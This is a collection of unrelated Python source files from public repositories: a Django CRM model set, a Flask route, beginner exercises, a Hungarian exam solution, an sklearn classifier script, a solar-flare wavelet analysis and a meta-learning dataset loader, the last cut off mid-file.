zip_safe=False\n)\n\npost_build()\n","repo_name":"forensicmatt/RustyPrefetch","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"35530072424","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nCLIENT_STATUS = [(\"prospect\", \"prospect\"), (\"client\", \"client\")]\n\n\nclass SalesTeamMember(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n employee = models.ForeignKey(to=User,\n default=None,\n on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f\"{self.employee.last_name} {self.employee.first_name}\"\n\n class Meta:\n verbose_name = \"Sales Team Member\"\n\n\nclass SupportTeamMember(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n employee = models.ForeignKey(to=User,\n default=None,\n on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f\"{self.employee.last_name} {self.employee.first_name}\"\n\n class Meta:\n verbose_name = \"Support Team Member\"\n\n\nclass Client(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n first_name = models.CharField('First name', max_length=20)\n last_name = models.CharField('Last name', max_length=20)\n email = models.EmailField()\n phone = models.CharField('Phone', max_length=20)\n mobile = models.CharField('Mobile', max_length=20)\n company_name = models.CharField('Company name', max_length=250)\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n sales_contact = models.ForeignKey(to=SalesTeamMember,\n on_delete=models.CASCADE,\n blank=True,\n null=True\n )\n status = models.CharField(max_length=10,\n choices=CLIENT_STATUS,\n default=\"prospect\")\n\n def __str__(self):\n return f\"{self.last_name} {self.first_name}\"\n\n class Meta:\n ordering = [\"last_name\"]\n\n\nclass Contract(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n sales_contact = models.ForeignKey(to=SalesTeamMember,\n on_delete=models.CASCADE,\n blank=True,\n null=True)\n client = models.ForeignKey(to=Client,\n on_delete=models.PROTECT,\n blank=True,\n null=True,\n related_name=\"contracts\"\n )\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n signed_status = models.BooleanField(null=True)\n amount = models.DecimalField(max_digits=10, decimal_places=2)\n payment_due = models.DateTimeField()\n\n class Meta:\n ordering = [\"client\"]\n\n\nclass EventStatus(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n status = models.CharField(max_length=150)\n notes = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return self.status\n\n class Meta:\n verbose_name = \"Event Status\"\n verbose_name_plural = \"Event Status\"\n\n\nclass Event(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n client = models.ForeignKey(to=Client,\n on_delete=models.PROTECT,\n blank=True,\n null=True)\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n support_contact = models.ForeignKey(to=SupportTeamMember,\n on_delete=models.CASCADE,\n blank=True,\n null=True\n )\n event_status = models.ForeignKey(to=EventStatus,\n on_delete=models.CASCADE,\n 
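# Sketch of the platform dispatch in post_build() above: map the running OS
# to the shared-library filename before copying it next to the package.
# The Darwin entry is an assumption; the original raises for unhandled
# platforms instead.
import platform

def dylib_name(stem='libfwnt'):
    return {
        'Windows': f'{stem}.dll',
        'Linux': f'{stem}.so',
        'Darwin': f'{stem}.dylib',   # assumption: macOS is not handled upstream
    }[platform.system()]

print(dylib_name())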
blank=True,\n null=True,\n related_name=\"events\"\n )\n attendees = models.IntegerField(blank=True, null=True)\n event_date = models.DateTimeField()\n notes = models.TextField(blank=True)\n\n def __str__(self):\n return f\"Event n° {self.id}\"\n\n class Meta:\n ordering = [\"event_date\"]\n","repo_name":"dardevetdidier/EpicEvent","sub_path":"crm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33723228922","text":"#!/usr/bin/python3\n\"\"\"sorts cities and states from the database\n\"\"\"\n\nfrom flask import Flask, render_template, url_for\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom models.state import State\n\n\napp = Flask(__name__)\n\n\n@app.route('/hbnb_filters', strict_slashes=False)\ndef hbnb_filters():\n \"\"\"filters the states and cities from database\"\"\"\n states = dict(sorted(storage.all(\"State\").items()))\n amenity = dict(sorted(storage.all(\"Amenity\").items()))\n return render_template('10-hbnb_filters.html', title='AirBnB Clone',\n states=states, amenities=amenity)\n\n\n@app.teardown_appcontext\ndef destroy(exception):\n \"\"\"Destroys the connection\"\"\"\n storage.close()\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=5000)\n","repo_name":"KingHawkins/AirBnB_clone_v4","sub_path":"web_flask/10-hbnb_filters.py","file_name":"10-hbnb_filters.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73670272747","text":"print('Press 1 for rock, 2 for scissors, 3 for paper')\n\nwhile True:\n\n x = int(input('player 1: '))\n y = int(input('player 2: '))\n dif = x - y\n\n while(x == y):\n x = str(input('player 1: '))\n y = str(input('player 2: '))\n\n if dif in [-1, 2]:\n print('player 1 wins.')\n if str(input('Do you want to play another game, yes or no?\\n')) == 'yes':\n continue\n else:\n print('game over.')\n break\n\n else:\n print('player 2 wins.')\n\n if str(input('Do you want to play another game, yes or no?\\n')) == 'yes':\n continue\n else:\n print('game over.')\n break\n\n","repo_name":"ElusiveFoxie/Python-Random-Scripts","sub_path":"python cwiczenia/zad8.py","file_name":"zad8.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41730172570","text":"hearthstone = 0\nfornite = 0\noverwatch = 0\nothers = 0\n\nsold_games = int(input())\nfor sold_game in range(1, sold_games + 1):\n game_name = input()\n\n if game_name == \"Hearthstone\":\n hearthstone += 1\n elif game_name == \"Fornite\":\n fornite += 1\n elif game_name == \"Overwatch\":\n overwatch += 1\n else:\n others += 1\n\nall_games = hearthstone + fornite + overwatch + others\n\nprint(f\"Hearthstone - {hearthstone / all_games * 100:.2f}%\")\nprint(f\"Fornite - {fornite / all_games * 100:.2f}%\")\nprint(f\"Overwatch - {overwatch / all_games * 100:.2f}%\")\nprint(f\"Others - {others / all_games * 100:.2f}%\")","repo_name":"elenaborisova/Python-Basics","sub_path":"13. Exam Prep Questions/04. SoftUni Past Exams/09. Game Shop.py","file_name":"09. 
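# The rock-paper-scissors record above decides the winner with
# dif in [-1, 2]; the same rule compresses to modular arithmetic.
# With 1=rock, 2=scissors, 3=paper, player 1 wins iff (x - y) % 3 == 2.
def winner(x, y):
    if x == y:
        return 'draw'
    return 'player 1' if (x - y) % 3 == 2 else 'player 2'

assert winner(1, 2) == 'player 1'   # rock beats scissors
assert winner(2, 3) == 'player 1'   # scissors beat paper
assert winner(3, 2) == 'player 2'   # scissors beat paper
assert winner(1, 1) == 'draw'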
Game Shop.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7831930600","text":"import pandas as pd\nfrom sklearn import svm\nfrom sklearn import neural_network as nn\nimport numpy as np\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle\n\nclass Train_API:\n def __init__(self):\n self.csv = pd.DataFrame()\n\n def save(self, csv):\n self.csv = csv\n\n def everything(self):\n le_dict = {}\n\n # transform categorical columns\n cat_col = ['Name', 'FB Current City', 'LinkedIn 500+?', 'School']\n for column_name in cat_col:\n le = LabelEncoder()\n self.csv[column_name] = le.fit_transform(self.csv[column_name])\n le_dict[column_name] = le\n\n # save label_encoder dictionary in pickle file\n with open('le_dict.pickle', 'wb') as handle:\n pickle.dump(le_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n # split data into 60/40 train-test\n train_df, test_df = tts(self.csv, train_size=.6, test_size=.4)\n\n # save training and test data\n pd.DataFrame.to_csv(train_df, 'csv/train.csv')\n pd.DataFrame.to_csv(test_df, 'csv/test.csv')\n pd.DataFrame.to_csv(self.csv, 'csv/transform.csv')\n return self.classifier()\n\n def classifier(self):\n # Section Classifier.2 - preprocessing\n # load label encoders\n with open('le_dict.pickle', 'rb') as f:\n le_dict = pickle.load(f)\n\n # return label encoder for names\n le = le_dict['Name']\n\n # split test_df and train_df into x and y\n test_df = pd.read_csv('csv/test.csv')\n train_df = pd.read_csv('csv/train.csv')\n transform_df = pd.read_csv('csv/transform.csv')\n test_df_y = test_df['Rich?']\n train_df_y = train_df['Rich?']\n transform_df_y = transform_df['Rich?']\n test_df_x = test_df.drop('Rich?', 1)\n train_df_x = train_df.drop('Rich?', 1)\n transform_df_x = transform_df.drop('Rich?', 1)\n\n # inverse transform name column for test and whole\n reverse_test_names = le.inverse_transform(test_df_x['Name'])\n reverse_test_names_whole = le.inverse_transform(transform_df_x['Name'])\n\n # support vector machine classifier\n clf = svm.SVC()\n clf.fit(train_df_x, train_df_y)\n clf_result = clf.predict(test_df_x)\n clf_result_whole = clf.predict(transform_df_x)\n print ('clf: ', clf.score(transform_df_x, transform_df_y))\n\n # linear SVC\n lin_clf = svm.LinearSVC()\n lin_clf.fit(train_df_x, train_df_y)\n lin_clf_result = lin_clf.predict(test_df_x)\n lin_clf_result_whole = lin_clf.predict(transform_df_x)\n print ('lin_clf: ', lin_clf.score(transform_df_x, transform_df_y))\n\n # MLP (multi-layer perception) Neural Network Classifier\n mlp_clf = nn.MLPClassifier()\n mlp_clf.fit(train_df_x, train_df_y)\n mlp_clf_result = mlp_clf.predict(test_df_x)\n mlp_clf_result_whole = mlp_clf.predict(transform_df_x)\n print ('mlp_clf: ', mlp_clf.score(transform_df_x, transform_df_y))\n\n # clean up result and compare predictions with actual for test\n result = np.vstack((reverse_test_names, clf_result, lin_clf_result, mlp_clf_result, test_df_y)).T\n df_result = pd.DataFrame(result, columns=['Name', 'SVM Pred', 'Linear Pred', 'MLP Pred', 'Actual'])\n df_result = df_result.set_index(df_result['Name'])\n df_result.drop('Name', axis=1, inplace=True)\n print (df_result)\n\n # clean up result and compare predictions with actual for all of mock data\n reverse_test_names = le.inverse_transform(transform_df_x['Name'])\n result = np.vstack((reverse_test_names_whole, clf_result_whole, lin_clf_result_whole,\n 
mlp_clf_result_whole, transform_df_y)).T\n df_result = pd.DataFrame(result, columns=['Name', 'SVM Pred', 'Linear Pred', 'MLP Pred', 'Actual'])\n df_result = df_result.set_index(df_result['Name'])\n df_result.drop('Name', axis=1, inplace=True)\n print (df_result)\n return df_result\n","repo_name":"yihahe/ieor185","sub_path":"app/train_api.py","file_name":"train_api.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23915868306","text":"# Ladányi Attila\n\n# 1.\n\nfoglaltlista = []\nkategorialista = []\n\nfor i in open(\"foglaltsag.txt\", \"r\", encoding = \"utf-8\"):\n seged = []\n\n for betu in i.strip():\n seged.append(betu)\n\n foglaltlista.append(seged)\n\nfor i in open(\"kategoria.txt\", \"r\", encoding = \"utf-8\"):\n seged = []\n\n for betu in i.strip():\n seged.append(int(betu))\n\n kategorialista.append(seged)\n\n# 2.\n\nprint(\"2. feladat\")\n\nbekersor = int(input(\"Kérem a sor számát: \"))\nbekerszek = int(input(\"Kérem a szék számát: \"))\n\nif foglaltlista[bekersor - 1][bekerszek - 1] == \"x\":\n print(\"A szék már foglalt.\")\nelse:\n print(\"A szék szabad.\")\n\n# 3.\n\nhanyjegyet = 0\n\nfor i in foglaltlista:\n for j in i:\n if j == \"x\":\n hanyjegyet += 1\n\nszazalek = int(round((hanyjegyet / (20 * 15)) * 100, 0))\n\nprint(f\"\\n3. feladat\\nAz előadásra eddig {hanyjegyet} jegyet adtak el, ez a nézőtér {szazalek}%-a.\")\n\n# 4.\n\ntipus = {}\n\nfor sor in range(0, 15):\n for szek in range(0, 20):\n if foglaltlista[sor][szek] == \"x\":\n tipus[kategorialista[sor][szek]] = tipus.get(kategorialista[sor][szek], 0) + 1\n\nlegtobb = [0, 0]\n\nfor i, j in tipus.items():\n if j > legtobb[1]:\n legtobb[0] = i\n legtobb[1] = j\n\nprint(f\"\\n4. feladat\\nA legtöbb jegyet a(z) {legtobb[0]}. árkategóriában értékesítették.\")\n\n# 5.\n\narak = {\n 1: 5000,\n 2: 4000,\n 3: 3000,\n 4: 2000,\n 5: 1500\n}\n\nbevetel = 0\n\nfor i, j in tipus.items():\n bevetel += arak[i] * j\n\nprint(f\"\\n5. feladat\\nA színház pillanatnyi bevétele {bevetel}Ft.\")\n\n# 6.\n\negyedulallo = 0\n\nfor sor in range(0, 15):\n for szek in range(0, 20):\n jelenlegi = foglaltlista[sor][szek]\n elotte = \"\"\n utana = \"\"\n try:\n if not szek - 1 == -1:\n elotte = foglaltlista[sor][szek - 1]\n else:\n elotte = \"x\"\n except IndexError:\n elotte = \"x\"\n\n try:\n utana = foglaltlista[sor][szek + 1]\n except IndexError:\n utana = \"x\"\n\n if jelenlegi == \"o\" and (elotte != \"o\" and utana != \"o\"):\n egyedulallo += 1\n\n\nprint(f\"\\n6. 
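# The Hungarian record above (nezoter.py, a theatre-auditorium exercise;
# "feladat" means "task") counts sold seats ('x') in a 15x20 grid and
# reports the occupancy percentage. Minimal English sketch of task 3:
rows = ["xxooo" * 4 for _ in range(15)]       # toy 15x20 auditorium
sold = sum(row.count('x') for row in rows)
pct = round(sold / (15 * 20) * 100)
print(f"{sold} tickets sold, {pct}% of the auditorium")   # 120 tickets, 40%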
feladat\\nEgyedülálló üres székek száma: {egyedulallo}\")\n\n# 7.\n\nf = open(\"szabad.txt\", \"w\", encoding=\"utf-8\")\n\nfor sor in range(0, 15):\n for szek in range(0, 20):\n if foglaltlista[sor][szek] == \"x\":\n f.write(\"x\")\n else:\n f.write(f\"{kategorialista[sor][szek]}\")\n f.write(\"\\n\")\n","repo_name":"DarkWither/erettsegi_megoldasok","sub_path":"programozas/2014_oktober/nezoter.py","file_name":"nezoter.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13663342186","text":"# External imports\nimport matplotlib.pylab as plt\nimport matplotlib.ticker as ticker\nfrom matplotlib.gridspec import GridSpec\nimport numpy as np\nimport os\nimport pandas as pd\nfrom scipy.interpolate import splrep, splev\n\n# Local imports\nfrom wavelet_transform.waveletFunctions import wave_signif, wavelet\n\n# CONFIG\nDATA_PATH = \"/dcs/large/u2288122/Workspace/qpp_classification/consolidated_data\"\nS = 64\nDT = 1\nMOTHER = 'MORLET'\nPADDING = 1 # pad the time series with zeroes (recommended)\nBUFFER = 20 # Buffer-signal on the left of peak\nDJ = 28.0\nLAG1 = 0.72 # lag-1 autocorrelation for red noise background\n\ndef flare2wavelet(flare, plot=False):\n # READ THE DATA & DERIVE PARAMS\n n = len(flare)\n time = np.arange(n) * DT # construct time array\n xlim = ([0, n * DT]) # plotting range\n\n if plot:\n fig = plt.figure(figsize=(9, 12))\n gs = GridSpec(4, 4, hspace=0.4, wspace=0.75)\n plt.subplots_adjust(left=0.1, bottom=0.05, right=0.9, top=0.95,\n wspace=0, hspace=0)\n # Plot the flare\n plt1 = plt.subplot(gs[0, 0:2])\n plt1.plot(time, flare, 'k')\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Flux')\n plt.title('a) Raw flare')\n \n \n flare_peak = np.argmax(flare)\n if flare_peak < BUFFER:\n flare_start = 0\n else:\n flare_start = flare_peak - BUFFER\n n = n - flare_start\n time = np.arange(n) * DT # construct time array\n xlim = ([0, n * DT]) # plotting range\n flare = flare[flare_start:]\n trend = splev(time, \\\n splrep(time, flare, s=S))\n detrended_flare = flare - trend\n\n variance = np.std(detrended_flare, ddof=1) ** 2\n # print(\"variance = \", variance)\n\n # TRANSFORMATION\n # Wavelet transform:\n wave, period, scale, coi = wavelet(detrended_flare, DT, pad=PADDING, mother=MOTHER)\n power = (np.abs(wave)) ** 2 # compute wavelet power spectrum\n global_ws = (np.sum(power, axis=1) / n) # time-average over all times\n coi_power = np.copy(power)\n for t_step, cap in enumerate(coi):\n coi_power[np.argwhere(period > cap), t_step] = 0 \n max_power = np.max(power)\n # print(f\"Max power levels: {max_power}\")\n\n # Significance levels:\n signif = wave_signif(([variance]), dt=DT, sigtest=0, scale=scale,\n lag1=LAG1, mother=MOTHER)\n # expand signif --> (J+1)x(N) array\n sig95 = signif[:, np.newaxis].dot(np.ones(n)[np.newaxis, :])\n sig95 = power / sig95 # where ratio > 1, power is significant\n\n # Global wavelet spectrum & significance levels:\n dof = n - scale # the -scale corrects for padding at edges\n global_signif = wave_signif(variance, dt=DT, scale=scale, sigtest=1,\n lag1=LAG1, dof=dof, mother=MOTHER)\n \n \n #PLOTTING\n if plot:\n # Plot the flare along with the trend\n plt2 = plt.subplot(gs[0, 2:])\n plt2.plot(time, flare, 'k')\n plt2.plot(time, trend, 'r--')\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Flux')\n plt.title('Flare with trendline (clipped)')\n\n \n # Plot the detrended flare\n plt3 = plt.subplot(gs[1, 0:3])\n plt3.plot(time, 
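# Sketch of the detrending step in flare2wavelet() above: fit a smoothing
# spline (smoothing factor s=S) and subtract it, leaving the oscillatory
# residual that the wavelet transform analyses. Standalone toy version.
import numpy as np
from scipy.interpolate import splrep, splev

t = np.arange(200, dtype=float)
flare = np.exp(-((t - 60) / 40.0) ** 2) + 0.05 * np.sin(t / 3.0)

trend = splev(t, splrep(t, flare, s=64))
detrended = flare - trend
print(detrended.std())   # roughly the amplitude of the residual oscillation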
detrended_flare, 'k')\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Flux')\n plt.title('b) Detrended flare')\n \n\n # Contour plot of wavelet power spectrum\n plt4 = plt.subplot(gs[2, 0:3])\n levels = [0, 0.5, 1, max_power / 2, max_power]\n # *** or use 'contour'\n CS = plt4.contourf(time, period, power, len(levels))\n im = plt4.contourf(CS, levels=levels,\n colors=['white', 'bisque', 'orange', 'orangered', 'darkred'])\n plt.xlim(xlim[:])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Frequency (seconds)')\n plt.title('c) Wavelet Power Spectrum')\n \n # 95# significance contour, levels at -99 (fake) and 1 (95# signif)\n plt4.contour(time, period, sig95, [-99, 1], colors='k')\n # cone-of-influence, anything \"above\" is dubious\n plt4.fill_between(time, coi * 0 + period[-1], coi, facecolor=\"none\",\n edgecolor=\"#00000040\", hatch='x')\n plt4.plot(time, coi, 'k')\n # format y-scale\n plt4.set_yscale('log')\n plt.ylim([np.min(period), np.max(period)])\n ax = plt.gca().yaxis\n ax.set_major_formatter(ticker.ScalarFormatter())\n plt.ticklabel_format(axis='y', style='plain')\n\n # --- Plot global wavelet spectrum\n plt4 = plt.subplot(gs[2, -1])\n plt.plot(global_ws, period)\n plt.plot(global_signif, period, '--')\n plt.xlabel('Power')\n plt.title('d) Global Wavelet Spectrum')\n plt.xlim([0, 1.25 * np.max(global_ws)])\n # format y-scale\n plt4.set_yscale('log')\n plt.ylim([np.min(period), np.max(period)])\n ax = plt.gca().yaxis\n ax.set_major_formatter(ticker.ScalarFormatter())\n plt.ticklabel_format(axis='y', style='plain')\n\n\n # Contour plot of wavelet coi_power spectrum\n plt5 = plt.subplot(gs[3, 0:3])\n levels = [0, 0.5, 1, max_power / 2, max_power]\n # *** or use 'contour'\n CS = plt.contourf(time, period, coi_power, len(levels))\n im = plt.contourf(CS, levels=levels,\n colors=['white', 'bisque', 'orange', 'orangered', 'darkred'])\n plt.xlabel('Time (seconds)')\n plt.ylabel('Frequency (seconds)')\n plt.title('e) Wavelet Power Spectrum (COI)')\n plt.xlim(xlim[:])\n # cone-of-influence, anything \"above\" is dubious\n plt.fill_between(time, coi * 0 + period[-1], coi, facecolor=\"none\",\n edgecolor=\"#00000040\", hatch='x')\n plt.plot(time, coi, 'k')\n # format y-scale\n plt5.set_yscale('log')\n plt.ylim([np.min(period), np.max(period)])\n ax = plt.gca().yaxis\n ax.set_major_formatter(ticker.ScalarFormatter())\n plt5.ticklabel_format(axis='y', style='plain')\n plt.show()\n \n return power.T, coi_power.T\n \n\n\nif __name__ == \"__main__\":\n flares_dataset = pd.read_pickle(os.path.join(DATA_PATH, 'flares.pkl'))\n print(flares_dataset.head)\n for i in range(48, 49):\n _, coip = flare2wavelet(flares_dataset.iloc[i].X, plot=True)\n print(flares_dataset.iloc[i].y)\n print(coip.shape)\n plt.plot(coip, 'x')\n plt.show()\n\n\n# NOTES\n\"\"\"\nflare\n-> get trend(flare)\n-> detrended flare = flare - trend\n detrended\n -> wavelet_transform(detrended_flare)\n -> power, coi\n power / coi_power [num_scales x t_steps] scales: discrete frequency bands [non-integrals]\n [!] 
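# The COI panel above zeroes wavelet power at periods longer than the
# cone-of-influence limit for each time step. A vectorised sketch of that
# masking (the original loops with np.argwhere):
import numpy as np

power = np.ones((4, 5))                 # (n_periods, n_times) toy spectrum
period = np.array([1., 2., 4., 8.])
coi = np.array([1., 3., 8., 3., 1.])    # COI cap per time step

coi_power = np.where(period[:, None] > coi[None, :], 0.0, power)
print(coi_power)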
We transpose these values: power / coi_power [t_steps x num_scales]\n\"\"\"","repo_name":"coder-amey/qpp_classification","sub_path":"preprocessing/flare2wavelet.py","file_name":"flare2wavelet.py","file_ext":"py","file_size_in_byte":6747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18583691031","text":"import torch\nimport numpy as np\nimport math\nfrom torch.utils.data import Dataset\nimport json\nimport os\nfrom tqdm import tqdm\nimport time\n\n\ndef make_maml_batch(domains, read_domain, n_trj, len_trj, t_steps, K):\n x_support = []\n a_support = []\n y_support = []\n x_query = []\n a_query = []\n y_query = []\n\n for domain in domains:\n x, x1, a = read_domain(domain)\n\n support_idxs = np.random.choice(x.shape[0], K, replace=False)\n query_idxs = list(range(x.shape[0]))\n for support_idx in support_idxs:\n query_idxs.remove(support_idx)\n\n x_s = np.reshape(x[support_idxs], (K * (len_trj - t_steps + 1), -1))\n x1_s = np.reshape(x1[support_idxs], (K * (len_trj - t_steps + 1), -1))\n a_s = np.reshape(a[support_idxs], (K * (len_trj - t_steps + 1), -1))\n x_q = np.reshape(x[query_idxs], ((n_trj - K) * (len_trj - t_steps + 1), -1))\n x1_q = np.reshape(x1[query_idxs], ((n_trj - K) * (len_trj - t_steps + 1), -1))\n a_q = np.reshape(a[query_idxs], ((n_trj - K) * (len_trj - t_steps + 1), -1))\n\n idx = list(range(x_s.shape[0]))\n np.random.shuffle(idx)\n\n x_support.append(np.expand_dims(x_s[idx], 0))\n y_support.append(np.expand_dims(x1_s[idx], 0))\n a_support.append(np.expand_dims(a_s[idx], 0))\n\n idx = list(range(x_q.shape[0]))\n np.random.shuffle(idx)\n\n x_query.append(np.expand_dims(x_q[idx], 0))\n y_query.append(np.expand_dims(x1_q[idx], 0))\n a_query.append(np.expand_dims(a_q[idx], 0))\n\n x_support = torch.from_numpy(np.concatenate(x_support, 0)).float()\n a_support = torch.from_numpy(np.concatenate(a_support, 0)).float()\n y_support = torch.from_numpy(np.concatenate(y_support, 0)).float()\n x_query = torch.from_numpy(np.concatenate(x_query, 0)).float()\n a_query = torch.from_numpy(np.concatenate(a_query, 0)).float()\n y_query = torch.from_numpy(np.concatenate(y_query, 0)).float()\n\n return x_support, a_support, y_support, x_query, a_query, y_query\n\n\ndef make_non_maml_batch(domains, read_domain, n_trj, len_trj, t_steps):\n x_data = []\n a_data = []\n y_data = []\n\n for domain in domains:\n x, x1, a = read_domain(domain)\n\n x_s = np.reshape(x, (n_trj * (len_trj - t_steps + 1), -1))\n x1_s = np.reshape(x1, (n_trj * (len_trj - t_steps + 1), -1))\n a_s = np.reshape(a, (n_trj * (len_trj - t_steps + 1), -1))\n\n idx = list(range(x_s.shape[0]))\n np.random.shuffle(idx)\n\n x_data.append(np.expand_dims(x_s[idx], 0))\n y_data.append(np.expand_dims(x1_s[idx], 0))\n a_data.append(np.expand_dims(a_s[idx], 0))\n\n # todo: load numpy not torch?\n x_data = torch.from_numpy(np.concatenate(x_data, 0)).float()\n a_data = torch.from_numpy(np.concatenate(a_data, 0)).float()\n y_data = torch.from_numpy(np.concatenate(y_data, 0)).float()\n\n return x_data, a_data, y_data\n\n\ndef euler_yaw_z_from_quaternion(quat):\n x = quat[0]\n y = quat[1]\n z = quat[2]\n w = quat[3]\n t3 = +2.0 * (w * z + x * y)\n t4 = +1.0 - 2.0 * (y * y + z * z)\n yaw_z = math.atan2(t3, t4)\n return yaw_z\n\nclass PushingDataset(Dataset):\n\n def __init__(self, params):\n\n self.subset = params['subset']\n self.val_ratio = params['test_split']\n\n self.dlo_only = params['dlo_only']\n self.obj_only = params['obj_only']\n self.obj_input = params['obj_input']\n\n 
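# Sketch of the support/query split used by make_maml_batch() above: K
# trajectories per task become the support set and the remainder the query
# set, sampled without replacement (np.setdiff1d is a named alternative to
# the original's list.remove loop).
import numpy as np

n_trj, K = 10, 3
support = np.random.choice(n_trj, K, replace=False)
query = np.setdiff1d(np.arange(n_trj), support)
assert len(support) == K and len(query) == n_trj - K
print(sorted(support), list(query))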
self.maml = params['maml']\n self.t_steps = params['t_steps']\n\n self.max_len_dlo = 32\n self.max_n_obj = 3\n self.n_trj = 500\n self.len_trj = 20 # 21 steps, 20 to predict\n\n # self.data_dir = '/Midgard/Data/areichlin/Robert_meta_learn/meta_learn3_clean'\n # self.data_dir = './meta_learn2_clean'\n self.data_dir = './meta_learn'\n\n self.subset_values = []\n self.subset_training_data = []\n self.subset_test_data = []\n\n self.data = {}\n\n for dir in os.listdir(self.data_dir):\n with open(self.data_dir+'/'+dir+'/params.json', 'r') as f:\n datapoint = json.load(f)\n self.data[str(datapoint[\"domain_id\"])] = datapoint\n\n self.training_data = []\n self.test_data = []\n\n self.ordered_data = {}\n\n for m_type in ['soft', 'flexible', 'elastoplastic']:\n self.ordered_data[m_type] = {}\n for att in ['none', 'movable', 'fixed']:\n self.ordered_data[m_type][att] = {}\n for l in [0.1, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16]:\n self.ordered_data[m_type][att][l] = {}\n for n_obj in [0, 1, 2, 3]:\n self.ordered_data[m_type][att][l][n_obj] = []\n\n\n\n for key, value in self.data.items():\n self.ordered_data[value['dlo']['material_type']][value['dlo']['attachment']][value['dlo']['length']][len(value['rigid_objects'])].append(key)\n\n\n\n\n\n\n # import matplotlib.pyplot as plt\n # sub_set = []\n # for m_type in ['flexible']:\n # for att in ['none']:\n # for l in [0.1]:\n # for n_obj in [3]:\n # sub_set.extend(self.ordered_data[m_type][att][l][n_obj])\n # count = 0\n # for dom in sub_set:\n # x, x1, a = self.read_domain(dom)\n # for trj in range(2):\n # fig = plt.figure()\n # for t in range(19):\n # for dlo in range(20):\n # plt.plot(x1[trj, t, dlo, 0], x1[trj, t, dlo, 1], 'ro', alpha=(t*1/20.))\n # plt.show()\n # count += 1\n # if count == 20:\n # break\n # print()\n\n\n\n\n\n\n for m_type in ['soft', 'flexible', 'elastoplastic']:\n for att in ['none', 'movable', 'fixed']:\n for l in [0.1, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16]:\n for n_obj in [0, 1, 2, 3]:\n train_split = int(len(self.ordered_data[m_type][att][l][n_obj])*(1. - self.val_ratio))\n self.training_data.extend(self.ordered_data[m_type][att][l][n_obj][:train_split])\n self.test_data.extend(self.ordered_data[m_type][att][l][n_obj][train_split:])\n\n if self.subset == 1:\n self.load_subset()\n\n def load_subset(self):\n for m_type in ['soft', 'flexible', 'elastoplastic']:\n for att in ['none', 'movable', 'fixed']:\n for l in [0.16]:\n for n_obj in [0]:\n train_split = int(len(self.ordered_data[m_type][att][l][n_obj]) * (1. 
- self.val_ratio))\n self.subset_training_data.extend(self.ordered_data[m_type][att][l][n_obj][:train_split])\n self.subset_test_data.extend(self.ordered_data[m_type][att][l][n_obj][train_split:])\n\n for indeces in [self.subset_training_data, self.subset_test_data]:\n x_data = []\n a_data = []\n y_data = []\n for domain in indeces:\n x, x1, a = self.read_domain(domain)\n x_data.append(torch.from_numpy(x).float())\n a_data.append(torch.from_numpy(a).float())\n y_data.append(torch.from_numpy(x1).float())\n self.subset_values.append({'x': x_data, 'a': a_data, 'y': y_data})\n\n def get_subset_batch(self, mode, N, K):\n\n if mode == 'train':\n mode_idx = 0\n else:\n mode_idx = 1\n\n if mode_idx == 0:\n task_sims = np.random.choice(range(len(self.subset_values[mode_idx]['x'])), N, replace=False)\n else:\n task_sims = range(len(self.subset_values[mode_idx]['x']))\n\n if self.maml == 0:\n x_s, a_s, y_s = [], [], []\n for task in task_sims:\n\n idx = list(range(self.n_trj * (self.len_trj - self.t_steps + 1)))\n np.random.shuffle(idx)\n\n x_s.append(torch.reshape(self.subset_values[mode_idx]['x'][task], (1, self.n_trj * (self.len_trj - self.t_steps + 1), -1))[:, idx])\n a_s.append(torch.reshape(self.subset_values[mode_idx]['a'][task], (1, self.n_trj * (self.len_trj - self.t_steps + 1), -1))[:, idx])\n y_s.append(torch.reshape(self.subset_values[mode_idx]['y'][task], (1, self.n_trj * (self.len_trj - self.t_steps + 1), -1))[:, idx])\n\n x_s = torch.cat(x_s, 0)\n a_s = torch.cat(a_s, 0)\n y_s = torch.cat(y_s, 0)\n\n return x_s, a_s, 